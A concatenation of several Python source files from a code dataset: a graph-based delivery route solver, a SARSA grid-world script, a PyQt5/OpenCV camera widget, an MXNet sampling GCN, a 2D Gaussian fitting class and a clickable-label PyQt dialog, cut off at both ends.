nx.Graph()\n clusterDict = clustering_approach.find_community_mappings(list_of_homes_int, G)\n dropoffs = clustering_approach.find_dropoff_locations(list_of_homes_int, G, car_start_int,\n clusterDict)\n all_distances = dict(nx.floyd_warshall(G))\n \"\"\" edges = {\"\"}\n edges.pop()\"\"\"\n if len(dropoffs) == 0:\n for _ in list_of_homes_int:\n for __ in list_of_homes_int:\n if not B.has_edge(_, __) and not __ == _:\n B.add_weighted_edges_from([(_, __, all_distances[_][__])])\n i = 0\n while car_start_int == list_of_homes_int[i]:\n i += 1\n B.add_weighted_edges_from([(car_start_int, list_of_homes_int[i], all_distances[car_start_int][list_of_homes_int[i]])])\n else:\n if car_start_int not in dropoffs:\n dropoffs += [car_start_int]\n for _ in dropoffs:\n for __ in dropoffs:\n if not B.has_edge(_, __) and not __ == _:\n B.add_weighted_edges_from([(_, __, all_distances[_][__])])\n return B\n\n\n#not working!!!! fix this\ndef preProcess(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix):\n\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)\n\n location_dict = {}\n list_of_homes_int = []\n list_of_locations_int = [_ for _ in range(len(list_of_locations))]\n for j in range(len(list_of_locations)):\n location_dict[j] = list_of_locations[j]\n if list_of_locations[j] == starting_car_location:\n car_start_int = j\n for _ in list_of_homes:\n if _ == list_of_locations[j]:\n list_of_homes_int += [j]\n\n for i in list_of_homes_int:\n if G[0].degree[i] == 1:\n list_of_homes_int[i] = G.edges[i][0]\n\n return list_of_locations, list_of_homes, starting_car_location, adjacency_matrix\n\n\n\ndef dist(node1, node2):\n # using networkx shortest_path function\n return nx.shortest_path()\n\ndef trivial_output_solver(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix, params=[]):\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)[0]\n\n # helper function with access to G\n def distance_between_locations(a, b):\n path_dist = nx.shortest_path_length(G, a, b)\n # print(\"distance from \" + str(a) + \" to \" + str(b) + \": \", path_dist)\n return path_dist\n\n # either proceed linearly through list of homes or through shuffled list of homes\n np.random.shuffle(list_of_homes) # shuffles in place; np.random.shuffle returns None\n homes = list_of_homes\n\n # using approximated average clustering for G:\n clustering_coeffs = nx.clustering(G)\n print(\"approximated average clustering coefficient:\", clustering_coeffs)\n home_coeffs = {int(h): clustering_coeffs[int(h)] for h in homes}\n print(\"home clustering coeffs:\", home_coeffs)\n\n # using the Girvan–Newman method to find communities of graphs\n # define custom function for how to select edges to remove in the algorithm\n def most_central_edge(G):\n centrality = nx.edge_betweenness_centrality(G, normalized=False, weight='weight')\n max_cent = max(centrality.values())\n # Scale the centrality values so they are between 0 and 1,\n # and add some random noise.\n centrality = {e: c / max_cent for e, c in centrality.items()}\n # Add some random noise.\n centrality = {e: c + np.random.random() for e, c in centrality.items()}\n return max(centrality, key=centrality.get)\n\n # get only the first k tuples of communities\n import itertools # stdlib import needed for islice below\n k = 10\n\n comp = nx.algorithms.community.centrality.girvan_newman(G, most_valuable_edge=most_central_edge)\n for communities in itertools.islice(comp, k):\n print(\"communities: \", tuple(sorted(c) for c in communities))\n\n # using A* from start to each node\n total_path = []\n current_home = homes[0]\n total_path += 
nx.astar_path(G, int(starting_car_location), int(current_home), distance_between_locations)\n for next_home in homes[1:]:\n # print(\"finding path between \" + str(current_home) + \" and \" + str(next_home))\n path_between = nx.astar_path(G, int(starting_car_location), int(current_home), distance_between_locations)\n total_path += path_between\n current_home = next_home\n total_path += nx.astar_path(G, int(current_home), int(starting_car_location), distance_between_locations)\n print(\"total super shitty path: \" + str(total_path))\n\n # locs = []\n # for i in list_of_locations:\n # locs.append(int(i))\n #\n # homes = []\n # for i in list_of_homes:\n # homes.append(int(i))\n\n # # first, find a node that is a neighbor of the start\n # dropOffIndex = None\n # for i in range(len(adjacency_matrix[0])):\n # if adjacency_matrix[0][i] == 1:\n # dropOffIndex = i\n #\n # dropOffNode = list_of_locations[dropOffIndex]\n\n graph_maker.print_trivial_output(len(list_of_locations), starting_car_location, list_of_homes)\n\n start = list_of_locations[int(starting_car_location)]\n # dropOffNode = list_of_locations[int(dropOffNode)]\n\n start = int(start)\n # dropOffNode = int(dropOffNode)\n return [start], {start: homes}\n\ndef compute_clustering_coefficient(G, trials=1000):\n n = len(G)\n triangles = 0\n nodes = G.nodes()\n for i in [np.random.randint(0, n) for i in range(trials)]:\n print([nodes[i]])\n nbrs = list(G[nodes[i]])\n if len(nbrs) < 2:\n continue\n u, v = np.random.choice(nbrs, 2)\n if u in G[v]:\n triangles += 1\n return triangles / float(trials)\n\n\n\"\"\"\n======================================================================\n No need to change any code below this line\n======================================================================\n\"\"\"\n\n\"\"\"\nConvert solution with path and dropoff_mapping in terms of indices\nand write solution output in terms of names to path_to_file + file_number + '.out'\n\"\"\"\ndef convertToFile(path, dropoff_mapping, path_to_file, list_locs):\n string = ''\n for node in path:\n string += list_locs[node] + ' '\n string = string.strip()\n string += '\\n'\n\n dropoffNumber = len(dropoff_mapping.keys())\n string += str(dropoffNumber) + '\\n'\n for dropoff in dropoff_mapping.keys():\n strDrop = list_locs[dropoff] + ' '\n for node in dropoff_mapping[dropoff]:\n strDrop += list_locs[node] + ' '\n strDrop = strDrop.strip()\n strDrop += '\\n'\n string += strDrop\n utils.write_to_file(path_to_file, string)\n\ndef solve_from_file(input_file, output_directory, params=[]):\n print('Processing', input_file)\n\n input_data = utils.read_file(input_file)\n num_of_locations, num_houses, list_locations, list_houses, starting_car_location, adjacency_matrix = data_parser(input_data)\n car_path, drop_offs = solve(list_locations, list_houses, starting_car_location, adjacency_matrix, params=params)\n\n basename, filename = os.path.split(input_file)\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n output_file = utils.input_to_output(input_file, output_directory)\n\n convertToFile(car_path, drop_offs, output_file, list_locations)\n\ndef solve_from_file_score(input_file, output_directory, params=[]):\n print('Processing', input_file)\n\n input_data = utils.read_file(input_file)\n num_of_locations, num_houses, list_locations, list_houses, starting_car_location, adjacency_matrix = data_parser(input_data)\n car_path, drop_offs = solve(list_locations, list_houses, starting_car_location, adjacency_matrix, params=params)\n\n basename, filename = 
os.path.split(input_file)\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n output_file = utils.input_to_output(input_file, output_directory)\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)[0]\n #convertToFile(car_path, drop_offs, output_file, list_locations)\n return G, car_path, drop_offs\n\n\ndef solve_all(input_directory, output_directory, params=[]):\n input_files = utils.get_files_with_extension(input_directory, 'in')\n\n for input_file in input_files:\n solve_from_file(input_file, output_directory, params=params)\n\ndef solve_some(input_directory, output_directory, params=[]):\n input_files = utils.get_files_with_extension(input_directory, 'in')\n num_so_far = 0\n score = 0\n for input_file in input_files:\n num_so_far += 1\n G, car_cycle, dropoff_mapping = solve_from_file_score(input_file, output_directory)\n this_score = student_utils.cost_of_solution(G, car_cycle, dropoff_mapping)[0]\n graph_total = sum(G[u][v]['weight'] for (u,v) in G.edges)\n score += graph_total / this_score\n if num_so_far == 10:\n print(\"score:\")\n print(score)\n break\n\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description='Parsing arguments')\n parser.add_argument('--all', action='store_true', help='If specified, the solver is run on all files in the input directory. Else, it is run on just the given input file')\n parser.add_argument('input', type=str, help='The path to the input file or directory')\n parser.add_argument('output_directory', type=str, nargs='?', default='.', help='The path to the directory where the output should be written')\n parser.add_argument('params', nargs=argparse.REMAINDER, help='Extra arguments passed in')\n args = parser.parse_args()\n output_directory = args.output_directory\n if args.all:\n input_directory = args.input\n solve_all(input_directory, output_directory, params=args.params)\n else:\n input_file = args.input\n solve_from_file(input_file, output_directory, params=args.params)\n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":13563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
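The final dropoff mapping in `solve` above boils down to assigning every home to the nearest vertex on the car's cycle under all-pairs shortest paths; a compact standalone restatement of just that step, on a made-up toy graph:

# Minimal restatement of the home -> dropoff assignment (toy data).
import networkx as nx

G = nx.Graph()
G.add_weighted_edges_from([(0, 1, 1.0), (1, 2, 2.0), (2, 3, 1.0), (0, 3, 5.0)])
cycle = [0, 1, 0]   # hypothetical car path
homes = [2, 3]

dist = dict(nx.floyd_warshall(G))
dropoffs = {}
for h in homes:
    stop = min(cycle, key=lambda v: dist[h][v])  # closest stop on the cycle
    dropoffs.setdefault(stop, []).append(h)
print(dropoffs)  # {1: [2, 3]} for this toy graph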
+{"seq_id":"620408073","text":"from __future__ import print_function, division\r\nfrom builtins import range\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom grid_world import standard_grid, negative_grid, ACTION_SPACE\r\nfrom grid_world_print import print_values, print_policy\r\n\r\ndef rand_action(a, eps=0.2):\r\n p = np.random.random()\r\n if p < (1 - eps):\r\n return a\r\n else:\r\n return np.random.choice(ACTION_SPACE)\r\n \r\n \r\n \r\ndef max_of(d):\r\n max_val = float('-inf')\r\n max_key = None\r\n for k, v in d.items():\r\n if v > max_val:\r\n max_val = v\r\n max_key = k\r\n return max_key, max_val\r\n\r\nif __name__ == '__main__':\r\n grid = negative_grid(step_cost=-0.1)\r\n\r\n print_values(grid.rewards, grid)\r\n print('\\n\\n')\r\n \r\n Q = {}\r\n for s in grid.all_states():\r\n Q[s] = {}\r\n for a in ACTION_SPACE:\r\n Q[s][a] = 0\r\n \r\n update_count = {}\r\n t = 1.0\r\n deltas = []\r\n \r\n for it in range(10000):\r\n if it%100 == 0:\r\n t = t + 1e-2\r\n if it%2000 == 0:\r\n print(it)\r\n \r\n s = (2,0)\r\n grid.set_state(s)\r\n \r\n a = max_of(Q[s])[0]\r\n a = rand_action(a, eps=0.5/t)\r\n biggest_change = 0\r\n while not grid.game_over():\r\n r = grid.move(a)\r\n s_next = grid.current_state()\r\n a_next = max_of(Q[s_next])[0]\r\n a_next = rand_action(a_next, eps=0.5/t) \r\n \r\n old_qsa = Q[s][a]\r\n Q[s][a] = Q[s][a] + 0.1*(r + 0.9*Q[s_next][a_next] - Q[s][a])\r\n biggest_change = max(biggest_change, np.abs(old_qsa - Q[s][a]))\r\n \r\n update_count[s] = update_count.get(s,0) + 1\r\n \r\n s = s_next\r\n a = a_next\r\n \r\n deltas.append(biggest_change)\r\n \r\n plt.plot(deltas)\r\n plt.show()\r\n \r\n V = {}\r\n policy = {}\r\n for s in grid.actions.keys():\r\n a, q = max_of(Q[s])\r\n policy[s] = a\r\n V[s] = q\r\n \r\n print(\"update counts:\")\r\n total = np.sum(list(update_count.values()))\r\n for k, v in update_count.items():\r\n update_count[k] = float(v) / total\r\n print_values(update_count, grid)\r\n \r\n \r\n \r\n print(\"values:\")\r\n print_values(V, grid)\r\n print(\"policy:\")\r\n print_policy(policy, grid)","sub_path":"sarsa.py","file_name":"sarsa.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"206005541","text":"'''\n@author: zhufd\n@license: (C) Copyright 明州体检\n@contact: 245838515@qq.com\n@software: hms(健康管理系统)\n@file: bcamera.py\n@time: 2018-12-29 20:49\n@desc:摄像头/视频读取模块\n'''\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt,QTimer\nfrom PyQt5.QtGui import QImage,QPixmap\nfrom PyQt5.QtMultimedia import *\nfrom PyQt5.QtMultimediaWidgets import *\ntry:\n import cv2\nexcept Exception as e:\n cv2 = None\n print(\"载入模块cv2 失败,信息:%s\" %e)\n\nclass CameraWidget(QLabel):\n\n # 通过Opencv模块来实现\n # 优点:读标准摄像头、读非标摄像头、读写视频、处理图片等\n # 缺点:1、对XP支持不好 2、多个摄像头同时读取(不能插在同一个Hub上)\n\n def __init__(self,show_x,show_y):\n super(CameraWidget, self).__init__()\n self.resize(show_x,show_y)\n self.setScaledContents(1)\n self.initParas()\n\n # 初始化默认参数\n def initParas(self):\n self.show_width = 320\n self.show_height = 240\n self.show_fps = 24\n\n # 设置显示参数\n def setShowSize(self,width=320,height=240,fps=24):\n '''\n :param width: 宽度\n :param height: 高度\n :param fps: 每秒帧数\n :return: None\n '''\n self.show_width = width\n self.show_height = height\n self.show_fps = fps\n\n # 打开摄像头\n def open(self,camera_index=0):\n self.cap = cv2.VideoCapture(camera_index)\n print(\"摄像头宽:%s,高:%s \" %(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH),self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n # 想要修改参数前请记住你摄像头参数的初始值;\n # 参数被改动了,是无法自动恢复到初始值的;\n # 除非特别需要,否则不要随意修改这些参数。\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.show_width) # 宽度\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, self.show_height) # 高度\n # self.cap.set(cv2.CAP_PROP_FPS, 30) # 帧数\n # self.cap.set(cv2.CAP_PROP_BRIGHTNESS, 1) # 亮度\n # self.cap.set(cv2.CAP_PROP_CONTRAST, 40) # 对比度\n # self.cap.set(cv2.CAP_PROP_SATURATION, 50) # 饱和度\n # self.cap.set(cv2.CAP_PROP_HUE, 50) # 色调\n # self.cap.set(cv2.CAP_PROP_EXPOSURE, 50) # 曝光\n self.start()\n\n # 开始图像传输,采用线程定时方式\n def start(self):\n self.timer = QTimer(self)\n self.timer.timeout.connect(self.onCapture)\n self.timer.start(1000 / self.show_fps)\n\n def onCapture(self):\n if not self.cap.isOpened():\n self.setText('打开失败,请检查配置!')\n self.setStyleSheet('''font: 75 14pt '黑体';color: rgb(204, 0, 0);''')\n return\n image = self.read()\n if image:\n self.setPixmap(QPixmap.fromImage(image, Qt.AutoColor))\n\n # 读取图像\n def read(self):\n # 按帧读取视频 其他方法\n # self.cap.retrieve()\n ret,frame = self.cap.read()\n # ret是布尔值 含义:如果读取帧是正确的则返回True,如果文件读取到结尾,它的返回值就为False。\n # frame就是每一帧的图像,是个三维矩阵\n try:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n ##############处理旋转#####################################\n # rows,cols,count = frame.shape\n # M = cv2.getRotationMatrix2D((cols / 2, rows / 2), 270, 1)\n # frame = cv2.warpAffine(frame, M, (cols, rows))\n image = QImage(frame.data, frame.shape[1], frame.shape[0], frame.shape[1] * 3,QImage.Format_RGB888)\n # image = QImage(frame.data, frame.shape[1], frame.shape[0], frame.shape[1] * 3,\n # QImage.Format_RGB888).rgbSwapped()\n return image\n except Exception as e:\n self.timer.stop()\n\n # 暂停\n def stop(self):\n cv2.waitKey(0)\n\n # 拍照\n def onTakeImage(self,name):\n image = self.read()\n if image:\n image.save(name)\n return image\n\n # 关闭摄像头\n def deleteLater(self):\n self.timer.stop()\n self.cap.release()\n super(CameraWidget, self).deleteLater()\n\n\nclass CameraDefaultUI(QWidget):\n\n def __init__(self,parent=None):\n super(CameraDefaultUI,self).__init__(parent)\n self.initUI()\n self.initParas()\n self.cb_camera_selector.currentIndexChanged.connect(self.on_camera_select)\n self.btn_stop.clicked.connect(self.on_camera_stop)\n self.btn_start.clicked.connect(self.on_camera_start)\n 
self.btn_take.clicked.connect(self.on_camera_take)\n # 特殊变量\n\n def initUI(self):\n\n lt_main = QVBoxLayout()\n # 摄像头 展示\n lt_top = QHBoxLayout()\n gp_top = QGroupBox('摄像头')\n # 设置取景器\n self.viewfinder = QCameraViewfinder()\n self.viewfinder.show()\n lt_top.addWidget(self.viewfinder)\n lt_top.addStretch()\n gp_top.setLayout(lt_top)\n # 摄像头 社遏制\n lt_middle = QHBoxLayout()\n gp_middle = QGroupBox('设置')\n self.cb_camera_selector = QComboBox()\n self.cb_camera_degree = QComboBox()\n self.cb_camera_degree.addItems(['0','90','180','270'])\n lt_middle.addWidget(QLabel(\"切换摄像头:\"))\n lt_middle.addWidget(self.cb_camera_selector)\n lt_middle.addWidget(QLabel(\"旋转角度:\"))\n lt_middle.addWidget(self.cb_camera_degree)\n lt_middle.addStretch()\n gp_middle.setLayout(lt_middle)\n\n lt_bottom = QHBoxLayout()\n gp_bottom = QGroupBox('功能栏')\n self.btn_start = QPushButton(Icon('启动'), '启动')\n self.btn_stop = QPushButton(Icon('停止'), '停止')\n self.btn_take = QPushButton(Icon('拍照'), '拍照')\n lt_bottom.addWidget(self.btn_start)\n lt_bottom.addWidget(self.btn_stop)\n lt_bottom.addWidget(self.btn_take)\n lt_bottom.addStretch()\n gp_bottom.setLayout(lt_bottom)\n # 添加布局\n lt_main.addWidget(gp_top)\n lt_main.addWidget(gp_middle)\n lt_main.addWidget(gp_bottom)\n self.setLayout(lt_main)\n\n def initParas(self):\n self.cb_camera_selector.addItems([QCamera.deviceDescription(c) for c in QCamera.availableDevices()])\n self.camera_objs = QCameraInfo.availableCameras()\n\n # 打开默认的摄像头\n self.on_camera_select(0)\n self.set_image = QImageEncoderSettings()\n self.set_audio = QAudioEncoderSettings()\n self.set_video = QVideoEncoderSettings()\n\n # 选择摄像头\n def on_camera_select(self, i):\n self.cur_camera_name = self.cb_camera_selector.currentText()\n self.camera = QCamera(self.camera_objs[i])\n self.camera.setViewfinder(self.viewfinder)\n self.camera.setCaptureMode(QCamera.CaptureStillImage)\n self.camera.error.connect(lambda: self.alert(self.camera.errorString()))\n self.save_seq = 0\n self.on_camera_start()\n\n self.capture = QCameraImageCapture(self.camera)\n self.capture.error.connect(lambda i, e, s: self.alert(s))\n\n\n # 拍照\n def on_camera_take(self,filename=None):\n if filename:\n pass\n else:\n self.viewfinder.setContrast(100)\n timestamp = time.strftime(\"%d-%b-%Y-%H_%M_%S\")\n self.capture.capture(os.path.join(\"d:/\", \"%s-%04d-%s.jpg\" % (\n self.cur_camera_name,\n self.save_seq,\n timestamp\n )))\n self.save_seq += 1\n\n # 开始\n def on_camera_start(self):\n self.camera.start()\n self.btn_start.setDisabled(True)\n self.btn_stop.setDisabled(False)\n\n # 停止\n def on_camera_stop(self):\n self.camera.stop()\n self.btn_start.setDisabled(False)\n self.btn_stop.setDisabled(True)\n\n def alert(self, mes):\n \"\"\"\n Handle errors coming from QCamera dn QCameraImageCapture by displaying alerts.\n \"\"\"\n err = QErrorMessage(self)\n err.showMessage(mes)","sub_path":"widgets/bcamera.py","file_name":"bcamera.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
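A possible way to run the OpenCV-backed widget above on its own; the import path follows this record's `sub_path`, and a webcam at index 0 is assumed:

# Hypothetical standalone usage of CameraWidget (requires PyQt5, cv2, a webcam).
import sys
from PyQt5.QtWidgets import QApplication
from widgets.bcamera import CameraWidget  # assumes the package layout above

app = QApplication(sys.argv)
w = CameraWidget(320, 240)       # widget display size
w.setShowSize(640, 480, fps=30)  # capture size and timer rate
w.open(camera_index=0)           # starts the QTimer-driven frame loop
w.show()
sys.exit(app.exec_())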
+{"seq_id":"499041763","text":"from __future__ import annotations\n\nfrom abc import abstractmethod\n\nimport mxnet as mx\nfrom typing import List, Dict\nfrom mxnet import nd\nfrom mxnet.gluon import Block, Parameter, ParameterDict\n\nfrom Graph import Subgraph, Graph\nfrom mxnet.ndarray import NDArray, Activation\n\nfrom common import model_ctx, data_ctx\nfrom samplers import Sampler\n\nfrom enum import Enum\n\nfrom samplers.LayerWiseSampler import LayerWiseSampler\n\nclass Mode(Enum):\n TRAINING = 1\n TEST = 2\n\n# TODO. Not ready at all\n\nclass LayerWiseSamplingGCN(Block):\n # noinspection PyPep8Naming\n def __init__(self,\n test_sampler: Sampler,\n graph: Graph,\n hidden_layer_sizes: List[int],\n concatenate_features: bool,\n nodes_per_layer: int):\n super().__init__()\n layer_sizes = [graph.num_features] + hidden_layer_sizes + [graph.num_classes]\n\n parameter_dict = ParameterDict()\n sizes_sum = [0] + list(layer_sizes)\n for i in range(1, len(sizes_sum)):\n sizes_sum[i] += sizes_sum[i - 1]\n sizes_sum[len(layer_sizes) - 1] = 0\n additional_sizes: List[i] = sizes_sum if concatenate_features else [0] * len(layer_sizes)\n\n # noinspection PyTypeChecker\n self._W: List[Parameter] = [parameter_dict.get(f\"W{i}\",\n shape=(layer_sizes[i + 1], layer_sizes[i] + additional_sizes[i]))\n for i in range(len(layer_sizes) - 1)]\n\n # noinspection PyTypeChecker\n self._b: List[Parameter] = [parameter_dict.get(f\"b{i}\", shape=(layer_sizes[i + 1], 1))\n for i in range(len(layer_sizes) - 1)]\n\n # noinspection PyTypeChecker\n self._g: Parameter = parameter_dict.get(f\"g\", shape=(layer_sizes[0], 1))\n\n parameter_dict.initialize(mx.init.Normal(sigma=0.1), ctx=model_ctx)\n\n # for w in self._W:\n # print(w.data().shape)\n\n self._feature_layers: List[List[NDArray]] = []\n for layer in range(len(layer_sizes)):\n features = [v.features\n if layer == 0 else\n nd.zeros(shape=(layer_sizes[layer] + additional_sizes[layer], 1), ctx=data_ctx)\n for v in graph.vertices]\n self._feature_layers.append(features)\n\n self._num_layers = len(self._feature_layers)\n self.parameter_dict = parameter_dict\n self.__training_sampler: Sampler = LayerWiseSampler(self, self._num_layers, nodes_per_layer)\n self.__test_sampler: Sampler = test_sampler\n self.mode = Mode.TRAINING\n self._graph = graph\n self._concatenate_features = concatenate_features\n\n def bound(self):\n for p in self._b + self._W:\n p.data()[:] = nd.clip(p.data(), -1e10, 1e10)\n\n def bound_layers(self):\n for layer in self._feature_layers:\n for arr in layer:\n arr[:] = nd.clip(arr, -1e10, 1e10)\n\n def forward(self, root_vertices: NDArray) -> NDArray:\n sampler = self.__training_sampler if self.mode == Mode.TRAINING else self.__test_sampler\n subgraphs = sampler.sample([self._graph.vertices[int(i.asscalar())] for i in root_vertices])\n vertices_on_layer: List[Dict[int, Subgraph]] = [{} for _ in range(self._num_layers)]\n self.__collect_vertices(subgraphs, len(self._feature_layers) - 1, vertices_on_layer)\n self.compute(vertices_on_layer)\n last_layer = [self._feature_layers[self._num_layers - 1][v.vertex] for v in subgraphs]\n return nd.stack(*last_layer).reshape(len(last_layer), -1)\n\n def __collect_vertices(self, subgraphs: List[Subgraph], layer: int, vertices_on_layer: List[Dict[int, Subgraph]]):\n \"\"\"\n Populates vertices_on_layer: for each layers stores which vertices must be computed.\n The main purpose is to avoid recomputation.\n\n :param subgraphs: subgraphs at the current layer\n :param layer: current layer\n :param vertices_on_layer: for 
each layers stores which vertices must be computed.\n :return: None\n \"\"\"\n for subgraph in subgraphs:\n vertices_on_layer[layer][subgraph.vertex] = subgraph\n if layer > 1:\n for subgraph in vertices_on_layer[layer].values():\n self.__collect_vertices(subgraph.neighbors, layer - 1, vertices_on_layer)\n\n @abstractmethod\n def compute(self, vertices_on_layer: List[Dict[int, Subgraph]]):\n \"\"\"\n Compute features which must be computed, according to vertices_on_layer.\n\n :param vertices_on_layer: For each layer stores a map: vertex.id -> subgraph.\n :return: None\n \"\"\"\n pass\n\n @abstractmethod\n def compute_vertex_layer(self, layer: int, vertex: int, subgraph: Subgraph) -> NDArray:\n pass\n\n @staticmethod\n def _act(x):\n return Activation(x, 'softrelu')\n","sub_path":"src/networks/LayerWiseSamplingGCN.py","file_name":"LayerWiseSamplingGCN.py","file_ext":"py","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"303556697","text":"import scipy\nimport Image\nimport ImageDraw\nimport scipy.optimize as optimize\n\nclass Gaussian2DFitError(Exception):\n def __init__(self, msg):\n self.message = msg\n\nclass Gaussian2DFit:\n def __init__(self, image):\n \"\"\" \n Class constructor\n ===================\n image : a scipy.ndarray instance of 2d\n \"\"\" \n \n if not (isinstance(image, scipy.ndarray) and image.ndim == 2):\n raise Gaussian2DFitError(\"image is not scipy.ndarray of 2 dims\")\n\n self._orig_image = image\n self._shape = self._orig_image.shape\n self._p, self._cov = self._calc_fit_param()\n\n def get_fit_param(self):\n \"\"\"\n Get fit parameter\n ====================\n Return: p, cov\n Note: p = [ A, B, x0, y0, sx, sy, theta ]\n cov is the covariance matrix\n \"\"\"\n\n return self._p, self._cov\n\n def save_fit_image(self, fname):\n \"\"\" \n Save image with border\n ====================\n fname: name of the file to be saved\n \"\"\"\n\n A, B, x0, y0, sx, sy, theta = self._p\n sx, sy = scipy.fabs([sx, sy])\n\n # First draw an upright ellipse\n shape = (self._shape[1], self._shape[0])\n\n border = Image.new('L', shape, \"black\")\n draw = ImageDraw.Draw(border)\n bbox = ( y0-sy/2, x0-sx/2, y0+sy/2, x0+sx/2 )\n draw.ellipse(bbox, outline='white')\n\n # Then rotate the ellipse around (x0, y0) with angle theta\n c, s = scipy.cos(theta), -scipy.sin(theta)\n \n matrix = ( c, -s, y0 * (1-c) + x0 * s,\n s, c, x0 * (1-c) - y0 * s )\n\n border = border.transform(shape, Image.AFFINE, matrix)\n\n # Finally paste \n rescaled = (255.0 / self._orig_image.max() * self._orig_image).astype(scipy.uint8)\n new_img = Image.fromarray(rescaled)\n new_img.paste(border, new_img)\n new_img.save(fname)\n \n\n def _calc_fit_param(self):\n\n def gaussian(A, B, x0, y0, sx, sy, theta):\n \"\"\"\n Returns a gaussian function centered at (x0, y0) with \n stdev = (sx, sy), and rotated at angle theta\n \"\"\"\n c, s = scipy.cos(theta), scipy.sin(theta)\n\n def f(x, y):\n xx = (c * (x-x0) - s * (y-y0)) / sx\n yy = (s * (x-x0) + c * (y-y0)) / sy\n return A*scipy.exp( -(xx**2+yy**2)/2 ) + B\n return f\n \n def error(p):\n X, Y = scipy.indices(self._shape)\n g = gaussian(*p)\n\n return (g(X, Y) - self._orig_image).ravel()\n\n estimate = self._estimate_fit_param()\n p, cov, infodict, mesg, ier = optimize.leastsq(error, estimate, \n full_output=True)\n\n success = ier in [1,2,3,4]\n \n if not success:\n raise Gaussian2dFitError\n\n else:\n # Make sure sx and sy are positive\n p[4], p[5] = scipy.fabs([p[4], p[5]])\n \n dof = self._orig_image.size - len(p)\n s_sq = (infodict['fvec']**2).sum() / dof\n cov = cov * s_sq\n\n return p, cov\n\n def _estimate_fit_param(self):\n B = self._orig_image.min()\n w = self._orig_image - B\n A = w.max() \n\n X, Y = scipy.indices(self._shape)\n\n x0 = scipy.average(X, None, w)\n y0 = scipy.average(Y, None, w)\n\n col = w[:, int(y0)]\n var_x = scipy.average((scipy.arange(col.size) - y0)**2, None, col)\n\n row = w[int(x0), :]\n var_y = scipy.average((scipy.arange(row.size) - x0)**2, None, row)\n \n return A, B, x0, y0, var_x**0.5, var_y**0.5, 0\n","sub_path":"gaussian_2d_fit.py","file_name":"gaussian_2d_fit.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"262840318","text":"# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------------\n# Nombre: QLabel_clickable.py\n# Autor: Miguel Andres Garcia Niño\n# Creado: 11 de Abril 2018\n# Modificado: 11 de Abril 2018\n# Copyright: (c) 2018 by Miguel Andres Garcia Niño, 2018\n# License: Apache License 2.0\n# ----------------------------------------------------------------------------\n\n__versión__ = \"1.0\"\n\n\"\"\"\nEl módulo *QLabel_clickable* permite llamar a una función al hacer clic o doble clic sobre\nun QLabel\n\"\"\"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon, QPixmap\nfrom PyQt5.QtCore import Qt, pyqtSignal, QTimer\nfrom PyQt5.QtWidgets import QApplication, QDialog, QLabel, QMessageBox\n\n\n# ===================== CLASE QLabelClickable ======================\n\nclass QLabelClickable(QLabel):\n clicked = pyqtSignal(str)\n \n def __init__(self, parent=None):\n super(QLabelClickable, self).__init__(parent)\n\n def mousePressEvent(self, event):\n self.ultimo = \"Clic\"\n \n def mouseReleaseEvent(self, event):\n if self.ultimo == \"Clic\":\n QTimer.singleShot(QApplication.instance().doubleClickInterval(),\n self.performSingleClickAction)\n else:\n # Realizar acción de doble clic.\n self.clicked.emit(self.ultimo)\n \n def mouseDoubleClickEvent(self, event):\n self.ultimo = \"Doble Clic\"\n \n def performSingleClickAction(self):\n if self.ultimo == \"Clic\":\n self.clicked.emit(self.ultimo)\n\n\n# ===================== CLASE labelClickable =======================\n\nclass labelClickable(QDialog):\n def __init__(self, parent=None):\n super(labelClickable, self).__init__(parent)\n \n self.setWindowTitle(\"GeXentation\")\n self.setWindowIcon(QIcon(\"icon.png\"))\n self.setWindowFlags(Qt.WindowCloseButtonHint | Qt.MSWindowsFixedSizeDialogHint)\n self.setFixedSize(450,400)\n\n self.initUI()\n\n def initUI(self):\n\n # ==================== WIDGET QLABEL =======================\n \n \n\n self.button=QtWidgets.QPushButton('Start', self)\n self.button.setStyleSheet(\"QPushButton{ border: 1px \"\n \"#; border-radius: 4.5px;font-size:20px;}\")\n self.button.setGeometry(320,100 ,80, 30)\n\n\n self.button1=QtWidgets.QPushButton('Manual', self)\n self.button1.setStyleSheet(\"QPushButton{ border: 1px \"\n \"#; border-radius: 4.5px;font-size:20px;}\")\n self.button1.setGeometry(320,140 ,80, 30)\n\n self.button2=QtWidgets.QPushButton('Exit', self)\n self.button2.setStyleSheet(\"QPushButton{border: 1px \"\n \"#; border-radius: 4.5px;font-size:20px;}\")\n \n self.button2.setGeometry(320,180 ,80, 30)\n self.button2.clicked.connect(self.close)\n\n\n self.labelImagen = QLabelClickable(self)\n self.labelImagen.setGeometry(50, 40, 120, 130)\n self.labelImagen.setToolTip(\"1st Gesture\")\n self.labelImagen.setCursor(Qt.PointingHandCursor)\n\n self.labelImagen.setStyleSheet(\"QLabel {background-color: transparent; border: 1px \"\n \"; border-radius: 5px;transition-property: transform;}\")\n\n self.labelImagen.setStyleSheet(\"QLabel:hover {background-color: white;}\")\n 